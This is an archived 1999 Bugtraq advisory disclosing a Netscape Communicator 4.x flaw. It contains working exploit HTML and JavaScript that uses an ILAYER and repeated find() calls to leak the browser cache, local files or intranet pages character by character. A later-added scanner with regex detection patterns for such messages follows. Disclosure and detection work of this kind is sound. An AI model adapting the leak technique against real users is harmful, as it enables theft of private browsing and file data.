Bugtraq
mailing list archives
Netscape Communicator find() vulnerabilities
From: guninski () HOTMAIL COM (Georgi Guninski)
Date: Mon, 8 Mar 1999 19:48:05 +0200
There is a design flaw in Netscape Communicator 4.5 Win95, 4.08 WinNT (I guess all 4.x versions are vulnerable) which allows the following security exploits:
*)Reading the parsed content of local HTML files (by 'parsed' I mean
the text the user sees, not the actual HTML source)
*)Reading the parsed content of HTML files on a web server blocked by a
firewall (the browser and the web server must be on the same side of the
firewall)
*)Reading the user's cache
*)Browsing directories
*)Probably others
The exploits use the JavaScript find() function and the ILAYER tag.
This may be exploited using an HTML message.
Workaround: Disable JavaScript
Demonstration is available at:
http://www.nat.bg/~joro/nsfind.html
-----------HTML code-------------
MBEGIN
<ILAYER SRC="wysiwyg://1/about:cache">
</ILAYER>
<SCRIPT>
// 'mag' is a string known to occur in the about:cache page loaded in the
// layer; 'mend' is the marker written after the layer (see MEND below).
//mag='MBEGIN';
mag='Average cache';
mend='MEND';
res=mag;
charstoread=100;
function readit() {
  for(i=0;i<charstoread;i++) {
    t=res;
    // Move the selection to the MEND marker below the layer, so that the
    // backward search (third argument true) below covers the layer's text.
    find(mend);
    // Extend the known prefix by one character: find() answers true only
    // when prefix + character occurs in the page, so each hit leaks a byte.
    for(c=1;c<256;c++) {
      t=res + String.fromCharCode(c);
      if (find(t,true,true)) {
        // alert(c);
        res=t;
      }
    }
  }
  res=res.substring(mag.length);
  alert("The first URL in your cache is: \n" + res);
}
setTimeout('readit();',3000);
</SCRIPT>
MEND
---------------------------------
Regards,
Georgi Guninski
http://www.nat.bg/~joro
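The post recommends disabling JavaScript; a mail gateway can also flag messages that combine the ingredients described above. The following scanner is an added example, not code from Guninski's post: it looks for a LAYER/ILAYER whose SRC points at cache, wysiwyg: or local content together with a script that calls find() inside a loop. The regex names, the scoring rule and the sample messages are assumptions.

```javascript
// Added example, not part of Guninski's post: a heuristic scanner for HTML
// message bodies that flags the ingredients this advisory combines: a LAYER/
// ILAYER whose SRC points at cache, wysiwyg: or local content, plus script
// calling find() inside a loop. Regex names, scoring and samples are assumed.
const LAYER_SRC_RE = /<i?layer\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
const FIND_CALL_RE = /\bfind\s*\(/g;
const LOOP_RE = /\b(for|while)\s*\(/;
// Sources the advisory names: about:cache, wysiwyg:, local files/paths.
const LOCAL_SRC_RE = /^(wysiwyg:|about:cache|file:|[a-z]:[\\\/])/i;

function scanHtmlForFindLeak(html) {
  const findings = [];
  const layerSrcs = [...html.matchAll(LAYER_SRC_RE)].map(m => m[1]);
  const localSrcs = layerSrcs.filter(s => LOCAL_SRC_RE.test(s));
  if (localSrcs.length) {
    findings.push(`layer loads local/cache content: ${localSrcs.join(', ')}`);
  }
  // Count find() call sites and note whether any sits inside a loop; the
  // loop requirement keeps ordinary Array.prototype.find() uses from firing.
  let findCalls = 0, loopedFind = false;
  for (const m of html.matchAll(SCRIPT_RE)) {
    const calls = (m[1].match(FIND_CALL_RE) || []).length;
    findCalls += calls;
    if (calls > 0 && LOOP_RE.test(m[1])) loopedFind = true;
  }
  if (loopedFind) findings.push(`find() called in a loop (${findCalls} call sites)`);
  // A layer of any origin plus a looping find() is the pattern; the intranet
  // variant in the advisory uses an http: SRC, so a local SRC is not required.
  const suspicious = layerSrcs.length > 0 && loopedFind;
  return { suspicious, layerSrcs, findCalls, findings };
}

// Constructed samples: a minimal form of the advisory's demo and a benign mail.
const SAMPLE_LEAK = '<ILAYER SRC="wysiwyg://1/about:cache"></ILAYER>' +
  '<SCRIPT>for(c=1;c<256;c++){if(find(res+String.fromCharCode(c),true,true))res=t;}</SCRIPT>';
const SAMPLE_BENIGN = '<p>Hello</p><script>document.write(new Date());</script>';

console.log(scanHtmlForFindLeak(SAMPLE_LEAK));
console.log(scanHtmlForFindLeak(SAMPLE_BENIGN));
```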